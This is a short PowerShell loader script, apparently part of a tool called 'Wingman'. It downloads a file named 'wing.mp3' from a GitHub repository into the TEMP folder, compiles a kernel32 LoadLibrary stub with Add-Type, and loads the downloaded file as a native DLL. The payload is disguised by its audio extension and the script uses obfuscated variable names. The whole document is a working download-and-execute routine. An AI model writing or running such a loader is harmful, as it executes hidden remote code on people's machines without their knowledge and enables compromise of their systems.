$f = $env:TEMP+"\wing.mp3"
$u='https://github.com/eforentropy/Wingman/raw/refs/heads/main/wing.mp3';  $i=[System.Net.WebRequest]::Create($u); $i.Method='GET'; $r=$i.GetResponse(); $s=$r.GetResponseStream(); $b=New-Object System.IO.MemoryStream; $s.CopyTo($b); [System.IO.File]::WriteAllBytes($f,$b.ToArray()); $b.Close(); $r.Close()
$CdGr= @"
using System;
using System.Runtime.InteropServices;
public class Load
{
    [DllImport("kernel32.dll")]
    public static extern IntPtr LoadLibrary(string dllToLoad);
}
"@
Add-Type $CdGr
$xzSmUwcL4oZI=[Load]::LoadLibrary($f)


if ($xzSmUwcL4oZI -eq [IntPtr]::Zero) {
    Write-Host "[!] Unexpected Behavior. Wingman Returned Zero. Terminal Not Safe for Invoking" -ForegroundColor Red
} else {
	Write-Host "==============================" -ForegroundColor Cyan
	Write-Host "        Wingman Completed     " -ForegroundColor Green
	Write-Host "==============================" -ForegroundColor Cyan
}

